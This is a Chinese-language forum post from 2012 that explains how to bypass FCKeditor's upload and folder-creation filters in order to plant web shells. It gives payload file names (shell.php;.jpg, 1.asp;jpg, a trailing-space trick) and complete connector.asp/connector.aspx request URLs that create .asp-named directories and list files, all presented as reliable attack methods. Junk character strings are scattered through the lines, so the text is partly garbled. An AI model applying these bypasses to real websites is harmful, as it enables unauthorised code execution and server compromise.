很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg1 e" x' v# Z5 P2 B0 u3 B+ A' C) H$ V6 a
* `; V+ h' Y: I8 I' H$ A提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
5 O' U7 w, v5 t0 T/ v- C! c! b4 G# c0 I
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
) } L5 O: h* A. K. E
2 R) b# a( N# ?4 h, q4 S' Q1 P突破建立文件夹:$ I$ g& C$ N4 j* w/ f
* I; o$ Q* I* _( J* v/ p3 Weditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp' x% _2 F+ R2 O) W/ H
) N2 T: c% ?. J C参数:
" s, ~. c6 o% c8 k( h, \
, I' e D1 ?# m当前目录名:CurrentFolder=/qing.asp- \& ^7 w# `! {1 |4 ^
1 ?7 `& g. Q& ^' D7 j3 F3 J
新的目录名:NewFolderName=x.asp% b( T, E' O: ]4 Q+ G
8 F' Q# y5 p4 m其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
2 [- r/ v) T% U3 O& t) P- ~% ?) k+ e8 \
那么 x.asp 就已经建立生成了,此方法百试百灵!% J, f! _+ g. z* o
0 r& B" \! _+ }6 d! |2 _3 k4 X; Q5 v
新建文件夹参数 x.asp,基本都能搞定。
4 a0 a) M3 D( u8 Q. j5 x! v: {
. R3 N) f# U% t1 q, X下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
9 U9 T5 n* }( {' Q: O+ A6 T; V( @$ p4 }9 \" Z8 w* V' E
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
; W: C. X6 X" s3 t0 N7 Q6 V' k/ Y- C1 L' \. F3 G: F5 S
获取文件列表6 ^+ U' ^& O' Y+ g2 r
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
8 {! {8 D$ x4 I( Z" Z+ s0 d; H8 M
|
发表于 2012-12-31 09:27:09
收藏
支持
反对